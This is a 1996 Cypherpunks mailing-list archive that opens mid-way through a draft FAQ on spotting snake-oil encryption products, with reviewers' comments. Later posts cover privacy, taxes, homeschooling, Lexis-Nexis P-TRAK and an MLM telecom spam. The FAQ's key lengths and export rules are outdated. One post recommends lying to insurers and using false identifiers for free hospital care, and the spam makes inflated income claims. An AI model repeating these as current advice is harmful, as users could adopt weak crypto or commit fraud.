ciphers are much more flexible, from a key management perspective. Each user has a pair of keys: a public key and a private key. The public key is shared widely, given to everyone, while the private key is kept secret. If Alice wishes to mail Bob some secrets, she simply gets Bob's public key, encrypts her message with it, and sends it off to Bob. When Bob gets the message, he uses is private key to decrypt the message. Asymmetric [cryptosystems] >>>algorithms<<< are much slower than [their symmetric counterparts.] >>> symmetric algorithms, and are almost exclusively used to encrypt short "session keys," which are then used to encrypt a message using the speedier symmetric algorithms. This use of public key cryptography is called "key exchange." ----------------------------- ----------------------------- [Also, key sizes must be much larger.] >>>I agree with one comment that discouraged comparing the 2 algo types. ----------------------------- See the cryptography FAQ for a more detailed discussion of [the topic.] >>>these topics.<<< Key Sizes ----------------------------- Some ciphers, while currently secure against most attacks, are not considered viable in the next few years because of relatively small keysizes and increasing processor speeds [(making a brute-force attacks feasible).] >>> Again, I maintain that the audience for this stuff can't be relied upon to even know what that means. Try: "which makes the cipher vulnerable to breaking by trying every possible key combination (called a brute-force attack)." --- or something like that. ----------------------------- The tables below should give some general guidelines for making intelligent decisions about the key length you need. If the key is too short, the system will be easily broken, even if the cipher is a good one. In [1] and [2], we're presented with some guidelines for deciding appropriate key length. (It is important to note that this is based on the ability to predict computing power 40, 65, and 100 years from now. Major breakthroughs in computing power 30 years from now might render everything on this chart kiddieplay.) Security Requirements for Different Information Type of Traffic Lifetime Minimum [Symmetric] Key Length Tactical military information minutes/hours 56-64 bits Product announcements, mergers, interest rates days/weeks 64 bits Long-term business plans years 64 bits Trade secrets (e.g., recipe for Coca-Cola) decades 112 bits H-bomb secrets >40 years 128 bits Identities of spies >50 years 128 bits Personal affairs >50 years 128 bits Diplomatic embarrassments >65 years at least 128 bits U.S. Census data 100 years at least 128 bits ----------------------------- >>> Where is the attribution for the table? ----------------------------- As mentioned earlier, asymmetric ciphers require significantly longer keys to provide the same level of security as their symmetric cipher counterparts. Here is a comparison table, again, from Applied Cryptography, second edition. Symmetric and Public-Key Lengths With Similar Resistance to Brute-Force Attacks Symmetric Key Length Public-key Key Length 56 bits 384 bits 64 bits 512 bits 80 bits 768 bits 112 bits 1792 bits 128 bits 2304 bits ----------------------------- >>> BEWARE, Danger: comparing public/private key cryptosystems again. I think if you really want to do so, then the comparison should really be explained. ----------------------------- Some Common Snake-Oil Warning Signs The following are some of the "red flags" one should watch for when examining an encryption product * Technobabble The vendor's description of the product may contain a lot of hard-to-follow use of technical terms to describe how the product works. If this appears to be confusing nonsense, it may very well be (even to someone familiar with the terminology). Technobabble is a good means of confusing a potential user and masking the fact that the vendor doesn't understand anything either. A sign of technobabble is a descrption which drops a lot of technical terms for how the system works without actually explaining how it works. Often specifically coined terms are used to describe the scheme which are not found in the literature. * New Type of Cryptography? Beware of any vendor who claims to have invented a "new type of cryptography" or a "revolutionary breakthrough". Truly "new break-throughs" are likely to show up in the >>> scientific <<< literature, and [many in the field] >>> professionals won't <<< [are unlikely to] trust them until after years of analysis, by which time they are not so new anymore. Avoid software which claims to use 'new paradigms' of computing such as cellular automata, neural nets, genetic algorithms, chaos theory, etc. Just because software uses to different method of computation doesn't make it more secure. ----------------------------- >>> As a matter of fact, these techniques are the subject of ongoing cryptographic research and nobody has published successful results based on their use yet. ----------------------------- Anything that claims to have invented a new [public key] cryptosystem without publishing the details or underlying mathematical principles is highly suspect. Modern cryptography, especially public key systems, is grounded in mathematical theory. The security is based on problems that are believed, if not known to be hard to solve. ----------------------------- >>> There are some other comments in cpunks on this last bit. I defer. ----------------------------- The strength of any encryption scheme is only proven by the test of time, >>> involving exhaustive analysis by cryptographers<<<. New crypto is like new pharmaceuticals, not new cars. * Proprietary Algorithms Avoid software which uses "proprietary" or "secret" algorithms. Security through obscurity is not considered a safe means of protecting your data. If the vendor does not feel confident that the method used can withstand years of scrutiny by the [academic] >>> professional and academic cryptographic <<< community, then you should be wary of trusting it. (Note that a vendor who specializes in the cryptography may have a proprietary algorithm which they'll show to others if they sign a non-disclosure agreement. If the vendor is well-reputed in the field, this can be an exception.) ----------------------------- >>> How can you tell a well-reputed vendor? I am thinging of one co. that promises to release their algo. details upon NDA, but at least in my case the details never showed up! This is slippery here! ----------------------------- Beware of specially modified versions of well-known algorithms. This may intentionally or unintentionally weaken the cipher. The use of a trusted algorithm, >>> availability of <<< [if not with] technical notes explaining the implementation ([if not availability of] >>> and preferably <<< the source code for the product) are a sign of good faith on the part of the vendor that you can take apart and test the implementation yourself. A common excuse for not disclosing how a program works is that "hackers might try to crack the program's security." While this may be a valid concern, it should be noted that such 'hackers' can reverse engineer the program to see how it works anyway. If the program is implemented properly and the algorithm is secure, this is not a problem. (If a hypothetical 'hacker' was able to get access you your system, access to encrypted data might be the least of your problems.) ----------------------------- >>> Add: The strength of a cryptosystem should depend ONLY on the security of the keys involved, and not the security of the algorithm. ----------------------------- * Experienced Security Experts and Rave Reviews Beware of any product claiming that "experienced security experts" have analyzed it, but it won't say who (especially if the scheme has not been published in a reputable journal). Don't rely on reviews in newspapers, magazines or television shows, since they generally don't have cryptologists (celebrity hackers who know about telephone systems don't count) take the software apart for them. Just because the vendor is a well known company or the algorithm is patented doesn't make it secure either. * Unbreakability Some vendors will claim their software is "unbreakable". This is marketing hype, and a common sign of snake-oil. Avoid any vendor that makes unrealistic claims. ----------------------------- >>> The reader is not qualified to evaluate realistic/unrealistic. ----------------------------- No algorithm is unbreakable. Even the best algorithms are breakable using "brute force" (trying every possible key), but if the key size is large enough, this is impractical even with vast amounts of computing power. One-time pads are unbreakable, but they must be implemented perfectly, which is, at best, very difficult. See the next section for a more detailed discussion. ----------------------------- >>> Add: Avoid products that use huge numbers to impress you that it would take massive amounts of time to break them. This is ONLY true under the assumption that the only way to break the system is by exhaustively trying every possible key, and this assumption hass to be proved before the claim is valid. A cryptosystem using a keylength of 50,000 bits theoretically would take 2 raised to the 50,000th power to break (a ridiculously large number) if, AND ONLY IF the algorithm had no weaknesses. The hard part of cryptosystem design is making an algorithm with no weaknesses, such that exhaustive brute-force search is the only method of breaking it, not using long keys. ----------------------------- * One-Time-Pads A vendor might claim the system uses a one-time-pad (OTP), which is theoretically unbreakable. That is, snake-oil sellers will try to capitalize on the known strength of a OTP. It is important to understand that any variation in the implementation means that it is not an OTP, and has nowhere near the security of an OTP. A OTP system is not an algorithm. It works by having a "pad" of random bits in the possession of both the sender and recipient. ----------------------------- >>> Explain what you mean by a "pad" --- using a term which to the newbie may not usually be associated with crypto. Origin being the pads of paper that they used to use etc.etc. ??? ----------------------------- ----------------------------- The message is encrypted using [the next n bits in the pad as they key, where n is the number of bits in the message] >>> as many bits from the key as there are bits in the message. That is, for each bit in the message, there is a random bit from the one-time-pad.<<< ----------------------------- After the bits are used from the pad, they're destroyed, and can never again be used. The bits in the pad must be truly random, generated using a real random source, such as specialized hardware, radioactive decay timings, etc., and not from an algorithm or cipher. Anything else is not a one-time-pad. The vendor may confuse random session keys or initialization vectors with OTPs. * Algorithm or product XXX is insecure Be wary of anything that makes claims that particular algorithms or other products are insecure without backing up those claims (or at least citing references to them). Sometimes attacks are theoretical or impractical (requiring special circumstances or massive computing power running for many years), and it's easy to confuse a layman by mentioning these. * Keys and Passwords The "key" and the "password" are often not the same thing. The "key" generally refers to the actual data used by the cipher, while the "password" refers to the word or phrase the user types in, which the software converts into the key (usually through a process called "hashing" or "key initialization"). >>> Other comments addressed this paragraph. I defer. The reason this is done is because the characters a user is likely to type in do not cover the full range of possible characters. (Such keys would be more redundant and easier for an attacker to guess.) By hashing a key can be made from an arbitrary password that covers the full range of possible keys. It also allows one to use longer words, or phrases and whole sentences as a "passphrase", which is more secure. Anything that restricts users' passwords to something like 10 or 16 or even 32 characters is foolish. If the actual "password" is the cipher's key (rather than hashing it into a key, as explained above), avoid it. If the vendor confuses the distinctions between bits, bytes and characters when discussing the key, avoid this product. Convenience is nice, but be wary of anything that sounds too easy to use. ----------------------------- >>> Instead, try: be wary of any product that overly emphasizes ease-of-use without due attention to its cryptographic strength. ----------------------------- Avoid anything that lets anyone with your copy of the software to access files, data, etc. without having to use some sort of key or passphrase. Avoid anything that doesn't let you generate your own keys (ie, the vendor sends you a key in the mail, or it's embedded in the copy of the software you buy). Avoid anything by a vendor who does not seem to understand the difference between public-key (asymmetric) cryptography and private-key (symmetric) cryptography. * Lost keys and passwords If there's a third-party utility that can crack the software, avoid it. >>> Which - the utility or the crypto? If the vendor claims it can recover lost passwords (without using a key-backup or escrow feature), avoid it. If there is a key-backup or escrow feature, are you in control of the backup, or does the vendor or someone else hold a copy of the key? * Exportable from the USA If the software is made in North America, can it be exported? If the answer is yes, chances are it's not very strong. Strong cryptography is considered munitions in terms of export from the United States, and requires approval from the State Department. Chances are if the software is exportable, the algorithm is weak or it is crackable (hence it was approved for export). If the vendor is unaware of export restrictions, avoid the software: the vendor is not familiar with the state of the art. Because of export restrictions, some legitimate (not-Snake Oil) products may have a freely exportable version for outside of the USA, which is different from a separate US/Canada-only distribution. Also note that just because software has made it outside of North America does not mean that it is exportable: sometimes a utility will be illegally exported and posted on an overseas site. Other Considerations Interface isn't everything: user-friendliness is an important factor, but if the product isn't secure then you're better off with something that is secure (if not as easy to use). No product is secure if it's not used properly. You can be the weakest link in the chain if you use a product carelessly. Do not trust any product to be foolproof, and be wary any product that claims it is. Contributors The following folks have contributed to this FAQ. Jeremey Barrett Jim Ray Robert Rothenburg Walking-Owl References 1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons, 1996 2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E. Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security," available via ftp://ftp.research.att.com/dist/mab/keylength.ps ------------------------------------------------------------------------ ---- C Matthew Curtin Last modified: Mon Sep 16 09:51:41 EDT ---------------------------------------------------------------------- -- C Matthew Curtin MEGASOFT, INC Chief Scientist I speak only for myself. Don't whine to anyone but me about anything I say. Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ From wsj-announce at interactive.wsj.com Wed Sep 18 18:17:29 1996 From: wsj-announce at interactive.wsj.com (The Wall Street Journal Interactive Edition) Date: Thu, 19 Sep 1996 09:17:29 +0800 Subject: Interactive Edition free access ends this week Message-ID: <2.2.32.19960917180356.0072c02c@pop.dowjones.com> Dear Subscriber: This Friday is the last day of your free trial subscription to The Wall Street Journal Interactive Edition. We hope you've enjoyed this extensive free period and that you will--if you haven't already--join us as a charter annual subscriber. You don't need to re-register. Just fill out a brief online form and provide us with payment information. An annual subscription costs just $49 a year or $29 a year if you subscribe to any print edition of The Wall Street Journal. To convert to an annual subscription, just access http://wsj.com and click on the "Convert Now" graphic. If you do not wish to convert to an annual subscription, you do not need to do anything -- you will not be billed and your subscription will be canceled automatically at the end of the trial. You may also be interested in a special offer available to users of Microsoft's Internet Explorer. Microsoft has made arrangements with several premier publishers on the Web, including the Interactive Edition, to offer subscriptions to Internet Explorer users at no charge through the end of this year. If you use Internet Explorer as your Web browser, you will be able to keep reading the Interactive Edition through Dec. 31, 1996, and there is no need for you to provide us with payment information at this time. For more information on this offer, you can visit http://wsj.com/ie.html or ask us questions at the e-mail address below. If you have questions or comments, e-mail us at the address below or call Customer Service at 1-800-369-2834 or 1-609-514-0870. Neil Budde Editor The Wall Street Journal Interactive Edition info at interactive.wsj.com -------------------------------------------------------- The WSJ-ANNOUNCE3 list is a service of The Wall Street Journal Interactive Edition (http://wsj.com). If you no longer wish to receive messages from the WSJ-ANNOUNCE3 list, simply reply to this message and in the body of your message type: UNSUBSCRIBE WSJ-ANNOUNCE3 From Adamsc at io-online.com Wed Sep 18 18:17:55 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 09:17:55 +0800 Subject: Informal Renegotiation of the Law Message-ID: <19960918160153703.AAC88@IO-ONLINE.COM> On Sun, 15 Sep 1996 17:54:49 -0500 (CDT), snow wrote: >> For example, you will not read anywhere that compulsory education laws have >> been repealed -- but they have. When the home schooling movement started in >> the late 1970s, there were occasional harassment and prosecution of parents. >> The home schoolers won some and lost some. As time went on, the authorities >> came to accept home schoolers so that at this point, legal problems are >> rare. Compulsory education has been effectively repealed by the actions of >> refusenicks in both the subject population and the enforcement population. > Their children are still getting educated. Not thoroughly enough in >some cases, but educated in the basics. It has always seemed somewhat amusing that we will have a) a widespread opinion that homeschooling is of lesser value and b) numerous studies, surveys, testimonials, reports, etc, that show what a rotten job public education is doing*. This raises the question of how anyone even remotely concerned with their children's welfare could do worse. . . Yet another unexplained mass insanity. * - I can add to the testimonial side of things here. I'm one of those rare teenagers who went straight to the professional workplace (bypassing college), but it's in spite of the best effort of our educational system, especially the so-called GATE programs (Gifted & Talented Education - more like stultification from my experience in 3 widely separate districts) or honors classes. They're real big on the "touchy-feely" but actual academic performance lags. My physics teacher was actually expected to teach AP level physics to a bunch of students who hadn't even had Algebra 2. (I never took Calculus, but that didn't prevent me from understanding a derivative or integral) I won't even rant about the English classes where a 400 page book (about 1.5 hours for me) is a semester's reading... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From bryce at digicash.com Wed Sep 18 18:22:14 1996 From: bryce at digicash.com (bryce at digicash.com) Date: Thu, 19 Sep 1996 09:22:14 +0800 Subject: author/subject ratings sharing, Bryce's cpunks killfile was: Re: cypherpunk listserve usefuln In-Reply-To: Message-ID: <199609181615.SAA19920@digicash.com> -----BEGIN PGP SIGNED MESSAGE----- A million monkeys operating under the pseudonym "Chip Mefford " typed: > > As much as it shames me, I have recently discovered that by filtering > messages from only 2 participants and setting body filters on 3 keywords > have remarkably improved the usefulness of this listserve. > > As much as I do enjoy some of the filtered subject matter, I really feel it > is very off subject and makes this listserver useless for the intended task. > > I guess that makes me a censor and it has me reexamining some things. It is very confusing to _me_, Chip, that you are ashamed of this or that it has shaken your beliefs somehow. Is it that you are not aware of the distinction between coercive "silencing of the speaker" censorship and non-coercive "ceasing to list to the speaker" censorship? I would love to know the two names and three subjects. In the spirit of reciprocation, here is a file called "cpunks.filter" I have. I currently process it by hand or with simple tcsh scripts. Actually I don't actually refer to this file very often. - ------- begin included file "cpunks.filter" ------- Authors: Bryce 9 Black Unicorn 7 Duncan Frissell 7 Robert A. Hettinga 7 Lucky Green 7 Sandy Sandfort 7 Hal 7 Perry E. Metzger 7 Tim May 7 John Young 5 llurch 5 Rick Smith 5 Jim Bell 0 Vulis 0 Subjects: DigiCash 9 Ecash 9 Chaum 8 nym 7 Java 5 trust 5 government 0 policy 0 escrow 0 GAK 0 terror 0 freeh 0 clinton 0 whitehouse 0 white house 0 FBI 0 NSA 0 export 0 munition 0 - ------- end included file "cpunks.filter" ------- Regards, Bryce -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2 iQB1AwUBMkAgBEjbHy8sKZitAQGC+gMAwQI3ltFVB7H3nrL9b6QZkcYX/VqXnAxQ cHA8KKVic4U/BvAKukCkxyIT2yKGSX+wyMiLmJ1eSbH2pa/zLGI1+OX0ySLCQgnF FLuc4H/AeRgm0f7TM2r62u3VnFoAcFlg =bUu/ -----END PGP SIGNATURE----- From frissell at panix.com Wed Sep 18 18:43:06 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 19 Sep 1996 09:43:06 +0800 Subject: GAK, GAP, GAY Message-ID: <3.0b19.32.19960918171325.00a0fee4@panix.com> At 10:52 AM 9/18/96 -0700, Timothy C. May wrote: >On a related note, I read an article yesterday about the proposed new >Health Data Base, with all encounters with any medical institution or any >health care provider of any sort being cross-linked and cross-referenced. Which is why some of us lie when we buy private insurance or seek treatment. If you "go bare" of course and use different identifiers whenever you seek treatment there are no problems. Hospitals have to treat people anyway under Hill-Burton Act rules and since they have accepted oligopoly status and have conspired with the Feds to do all sorts of nasty privacy invasions, I don't see many libertarian problems in taking them up on their offer of free care. Private health insurance in Mexico and the UK is also cheap (by US standards). If Canada legalizes private insurance, it will be cheaper too. >And such data bases will be tied to True Names, of course, thus allowing >the "freezing out" of anyone who is not a True Name, who has fallen behind >in child support payments, who is late on his income taxes, and so on. No proposals yet along these lines although smokers might be denied care. >It doesn't matter if cash is still allowed if one cannot interact with any >health care person without a proper citizen-unit data base entry. They've >got you tracked even if you pay in gold dust. Claim to be a foreigner. >(Putting on my Duncan cap--not to be confused with dunce cap--I wonder what >will happen the first time someone dies because a hospital wouldn't treat >someone without a proper citizen-unit health care card?) So far it's just for reporting and not authorization purposes. >P.S. I fully understand that some doctors will treat patients for cash, >without reporting to The Authorities, just as some doctors will treat >gunshot wounds without the mandatory reporting of same to the police. This >does not mean such doctors will be easy to find. The System, if allowed to >win, will win. Particularly libertarian physicians. Also everyone goes to Mexico for (prescription) drugs these days. Maybe they will also seek treatment there or in Canada. >P.P.S. Many of the things we talk about on the list are being made >possible--the good and the bad--by computerization. Obviously. Burnham's >"Age of Privacy" (or maybe it was "The Age of Surveillance"--my copy is not >handy) made this point many years ago. We are taking the mechanization and >systematization procedures the Germans used so efficiently in the 1930s and >modernizing them, with every movement and every transactions tracked and >recorded in data bases. And yet, has anyone noticed any greater sense that we are orderly or in control. I think that we are more disordered than we have been in my lifetime at least. It obviously hasn't worked yet. DCF From tcmay at got.net Wed Sep 18 19:00:40 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 10:00:40 +0800 Subject: Wealth Tax vs. Capital Gains Tax Reduction Message-ID: At 5:27 PM 9/18/96, Jason Vagner wrote: >On Tue, 17 Sep 1996, Timothy C. May wrote: > >> >> I've been thinking a lot about the prospects of a "wealth tax," or "asset >> tax," in the U.S. With the stock market averages at record levels (and, >> hey, Intel has gone up $6 just so far today, to an unheard of $94.5 level), >> and with increasing fractions of people's overall net worth tied up in >> equities, bonds, houses, property, etc., it may be that the looters will >> take a more serious look at taxing people's overall wealth, e.g., the 5% of >> net worth per year that some countries have. > >Forgive me if this is a stupid question, but could this lead to >"engineering" the market at particularly times of the year to decrease the >"official" value of an entity's value and complicating the pricing of >equities? Would this become a viable means for those with less wealth to >capitalize on the momentary "dip" in prices? Certainly people would look for "loopholes" and mechanisms for reducing their officially-calculated wealth, were such a wealth tax to be implemented. For example, they might find ways to transfer their wealth to trusts, corporations, foundations, etc., and then "use" this wealth by hiring themselves as high-priced consultants, providing "company cars" and "company yachts." (Arguably this already happens, with such corporate perquisites considered part of the compensation package for many highly-paid executives.) As to whether there are schemes for reducing the valuation of equities only at certain times of the year, I can't think of any that would have a significant effect. Deals to sell stock at artificially low prices are frowned upon. As are "parking" schemes. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From shamrock at netcom.com Wed Sep 18 19:05:49 1996 From: shamrock at netcom.com (Lucky Green) Date: Thu, 19 Sep 1996 10:05:49 +0800 Subject: Spam blacklist project In-Reply-To: <3.0b19.32.19960918112541.00a0bc48@panix.com> Message-ID: On Wed, 18 Sep 1996, Duncan Frissell wrote: > hallam at ai.mit.edu writes: > > > Well if some people find it amazing that there are people out there > > who agree with the 98.8% of people who did not vote Libertarian at the > > last election then so be it. > > Course half the eligible population didn't vote at all obviously favoring > market and personal approaches over political methods of governance. Half the population doesn't care who their masters are, as long as they have masters that tell them what to do. --Lucky From zachb at netcom.com Wed Sep 18 19:14:41 1996 From: zachb at netcom.com (Z.B.) Date: Thu, 19 Sep 1996 10:14:41 +0800 Subject: cypherpunk listserve usefulness In-Reply-To: Message-ID: On Wed, 18 Sep 1996, Chip Mefford wrote: > > As much as it shames me, I have recently discovered that by filtering > messages from only 2 participants and setting body filters on 3 keywords > have remarkably improved the usefulness of this listserve. > [snip] > > I guess that makes me a censor and it has me reexamining some things. > No, you're not a censor. You are merely determining what *you* choose to read. That's perfectly acceptable - probably a lot of people on this list also filter their messages to some extent. Now, if you tried to force the rest of us to abide by the standards that you set for yourself, then you would be trying to censor us. There is a big difference here. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From doc at pgh.org Thu Sep 19 07:21:33 1996 From: doc at pgh.org (Net Doctor) Date: Thu, 19 Sep 1996 10:21:33 -0400 Subject: manetelg Message-ID: check UNIX format: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Become an Independent Representative of NeTeL Telecommunications & Technology Join our successful team of NeTeL Independent Representatives in coordination with the Manus Corporation, and receive: * Free InterNet access. * Free upline support, forever. * Free monthly electronic newsletter that provides you with fast breaking news, training, tips, ideas, announcements and more. * Free business cards (for qualified representatives) * Free information package, and much more. Our contact number is (412) TAX-RULE, and you can reach us by voice or fax 24 hours a day, 7 days a week. This is the best MLM opportunity and support package you can find. If someone can beat this deal, please let us know where. WE ARE NOT PROMISING YOU THE WORLD but with a little effort, with a simple, honest and FREE business opportunity and the solid support provided, YOU CAN MAKE IT POSSIBLE!!! NETEL & THE OPPORTUNITY: Telecommunications is currently a $100 billion industry. Growing at a rate of 500 million per month and is currently the fastest growing Industry in the USA. Founded in 1985, Wiltel ( part of LDDS/WORLDCOM) owns and operates a nationwide 100% digital fiber optic network and provides world wide service. You may have seen the LDDS WORLDCOM commercials on Television with Michael Jordan selling long distance. NeTeL contracts with Wiltel and markets these products and services through Cooperative Marketing -- Giving self-starters like you the opportunity to be in business for yourself but not by yourself, simply because of a very solid support system. The NeTeL business opportunity allows you to make money in your spare time and can eventually grow into a full time business. So Here are the Specifics: * 9.9 cents per minute nationwide long-distance,DAYTIME RATE * 100 DIGITAL FIBER OPTIC NETWORK * NO INVESTMENT -- NO INVENTORY TO STOCK * NO ANNUAL RENEWAL FEE -- NO HYPE Take a look at what the NeTeL business opportunity has to offer: * 9.9 cents per/min 24 hours a day, 7 days a week (with monthly fee) * Up to 50% savings on International calls. * Home 800#. 9.9 cents/min 24 hours a day, 7 days a week. (Avoid heavy toll charges-Perfect for kids away at college.) * Zero surcharge calling cards * Pager, Internet access, calling cards, prepaid calling cards, preferred option, with very low rates. Cellular phones in the near future. * Get $100 commission advance when you get three people who sign up three others, regardless of their initial long-distance usage. * 100 % digital fiber optic network * One bill from your local telephone company. * Free Starter kit. * NeTeL pays you 8 levels of compensation LEVELS COMMISSION 1. You ------------ 5%* 2.----------------------2% 3.----------------------2% 4. ---------------------2% 5.___________2% 6.___________2% 7.___________2% 8.___________2% * Volume $2500 or greater or otherwise 2% applies. FREQUENTLY ASK QUESTIONS & ANSWERS Q. How does NeTeL make it all possible? A. NeTeL does not invest vast sums in advertising, which only creates higher rates for customers. Therefore they are able to pass on those savings right along to the customers. Q. How long will it take to switch to NeTeL from another carrier? A. 5-7 business days after receiving your call or from the time they receive your application. Q. How do I get paid when I sign up people? A. You'll receive $100 commission advance by finding 3 people like you to become Independent Representatives, and who sign up at least three people. You'll also receive 5% commission on the first level ( first level $2500 or greater, otherwise 2% applies) and an additional 2%, 8 levels deep. That's a 19% pay-out. Q. When will I receive a check from NeTeL? A. After 60 days from the time you enroll someone in NeTeL. Q. What other service does NeTeL provide? A. NeTeL currently offers, prepaid calling cards, calling cards with international access, travel cards, preferred option card with features such as voice mail, fax mail, conference calling, lotto results, headline news, sports update, stock quotes and more (earn cash profits and a 2% residual income on this card.) Pager services, Cellular services and Internet access are all on the way. Q. How do I keep track of the people I sign up? A. NeTeL does it for you. You'll receive a free report outlining the billing activity of subscribers in your personal network along with your commission checks. Q. Can I really make money with NeTeL? A. Look what happens if you refer 3 people and they refer 3 people each. Levels Customers 1st-----------------------3 2nd----------------------9 3rd----------------------27 4th----------------------81 5th----------------------243 6th----------------------729 7th----------------------2,187 8th----------------------6,561 Total # of customers 9,840 average long distance bill $35.00 Total billing $344,400 Your 2% residual income: Your monthly income: $ 6,888.00 Your annual income: $ 82,656.00 To sign up as a representative simply call 1-800-99-NeTeL or 1-888-333-TEL3, ask for the SALES DEPARTMENT and provide your name, address, SSN, your telephone number and this sponsor ID#: JG-343637 The telephone number must be in your name and will be switched to NeTeL.IF YOU DON'T HAVE A PHONE IN YOUR NAME YOU CAN STILL BECOME AN INDEPENDENT REPRESENTATIVE; Simply call NeTeL and ask for the SALES DEPT. and tell them that you would like to sign up as an INDEPENDENT REPRESENTATIVE. Active customer service are M-F 9-6 PM EST. If you have any questions, just call my 24-hour Service Line at (412) TAX-RULE and leave a message. We'll get back to you promptly. Leave your e-mail address when you call. and spell it out if it is complicated. MANUS, Inc.- 24 hr. voice/fax: (412) 829-7853 InterNet: manus at pgh.org NeTeL Independent Representative -- Sponsor ID#: JG-343637 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From byrd at acm.org Wed Sep 18 19:23:04 1996 From: byrd at acm.org (Jim Byrd) Date: Thu, 19 Sep 1996 10:23:04 +0800 Subject: official statement from Lexis-Nexis about P-Trak Message-ID: <2.2.32.19960918220243.006cbbd4@super.zippo.com> This statement was issued today: -------- STATEMENT FROM LEXIS-NEXIS 9/18/96 Incorrect information is being distributed on Internet newsgroups regarding the data displayed in LEXIS-NEXIS' P-TRAK file. P-TRAK is like an electronic "white pages." The only information displayed is the name of the individual, current address and up to two previous addresses and telephone number. In some cases, the individual's maiden name may appear and as well as the month and year of birth. That is the ONLY information displayed in the P-TRAK file. Contrary to some messages that have been posted to some Internet discussion and news groups, the P-TRAK file DOES NOT contain any credit histories, bank account information, personal financial data, mother's maiden name or medical histories. This misinformation has been posted over and over again to various news groups. An example of a record appears below: Name: DOE, JOHN E Current Address: 1066 Anywhere Drive, Dayton, OH 95454 Previous Address: 106 Somewhere Drive, Dayton, OH 92454 Birthdate: 9/1965 Telephone Number: 555-1212 On File Since: 6/1/1994 The information displayed in the P-TRAK file is the type of information readily available from public information sources such as telephone directories (in print and CD-ROM format) and public records maintained by government agencies. LEXIS-NEXIS markets the P-TRAK file to the legal community for use by general legal practitioners, litigators and public attorneys, as well as law enforcement agencies and police departments. These professionals use the P-TRAK file to assist in locating litigants, witnesses, shareholders, debtors, heirs and beneficiaries. LEXIS-NEXIS is aware of the sensitivities regarding the potential misuse of information. Business competitors of LEXIS-NEXIS have for some time made Social Security numbers available to users of their services. In addition, Social Security Numbers and other information are available on the Internet from a number of sources. Despite this wide availability of Social Security numbers in the market place, LEXIS-NEXIS discontinued the display of Social Security numbers in the P-TRAK file as of June 11, 1996, eleven days after the product was introduced. Through its actions, LEXIS-NEXIS is balancing the privacy concerns of the public with the legitimate needs of legal, business and government professionals for access to accurate sources of publicly available information. By discontinuing the display of Social Security numbers in P-TRAK and only providing information that is already available to the public from other sources, LEXIS-NEXIS believes it has responsibly met the expressed concerns of the public. Individuals interested in having their names removed from the P-TRAK file can e-mail their full name and complete address to: p-trak at prod.lexis-nexis.com or mail this information to ATTN: P-TRAK, P. O. Box 933, Dayton, OH 45401. From frissell at panix.com Wed Sep 18 19:29:15 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 19 Sep 1996 10:29:15 +0800 Subject: Informal Renegotiation of the Law Message-ID: <3.0b19.32.19960918161831.00a0aebc@panix.com> At 09:36 PM 9/17/96 -0800, Adamsc wrote: >It has always seemed somewhat amusing that we will have a) a widespread opinion >that homeschooling is of lesser value and b) numerous studies, surveys, >testimonials, reports, etc, that show what a rotten job public education is >doing*. This raises the question of how anyone even remotely concerned with >their children's welfare could do worse. . . Yet another unexplained mass >insanity. 'Gubmint Skools one of the most common forms of child abuse in America today. Luckily, the same contradictions in the Stalinist methods of production that brought the old SU to its knees are working their wonders on Education as well. Expect it to die from the top as tertiary education is seduced away by the cash derived from selling its wares over the Net. Then with the Web easing Primary and Secondary education at home and the schools worsening, more people will opt out. They will be further encouraged as the schools become the nexus for ever tighter regulation of family and personal life. After all, teachers, nurses, and social workers, work on and with their "charges" to uncover, child abusers, illegal aliens, substance abusers and who knows what all among the parents. The schools also keep loads of records on their "customers." Those who have never turned their kids over to the government for brain massage, find that they have many fewer run ins with the authorities. They also find that their kids are more likely to be able to infer, imply, and know the difference between the two. DCF From alexlh at yourchoice.nl Wed Sep 18 19:47:37 1996 From: alexlh at yourchoice.nl (Alex Le Heux) Date: Thu, 19 Sep 1996 10:47:37 +0800 Subject: Spam blacklist project In-Reply-To: <9609162025.AA00550@etna.ai.mit.edu> Message-ID: On Mon, 16 Sep 1996 hallam at ai.mit.edu wrote: > > Hi, > > The following idea just hit me. How about a server which > maintained a list of people who don't want to recive SPAM? The idea > being that email recpients who don't want SPAM send their email > address to the list. A SPAMer who want to check an email to see > if it is on the list could then obtain the SHA-Digested list of > addresses and remove them from their internal databases. > Such a beast already exists: A simple search for 'spam' on www.yahoo.com reveals: The Internet Spam Control Centre : http://drsvcs.com/nospam/ > Of course I don't for a moment imagine that this will > be 100% effective. Without government regulation there will > always be slimeballs who send mail to people who don't want it. > I think the internet will be better off without any government regulation. Governments tend to make a mess of everything they regulate. Cheers, Alex Le Heux /// I dabble in techno-house and sometimes, /// I do that badass hip-hop thang... /// But the F U N K gets me every time! From aba at dcs.ex.ac.uk Wed Sep 18 19:49:50 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Thu, 19 Sep 1996 10:49:50 +0800 Subject: monkey-wrenching 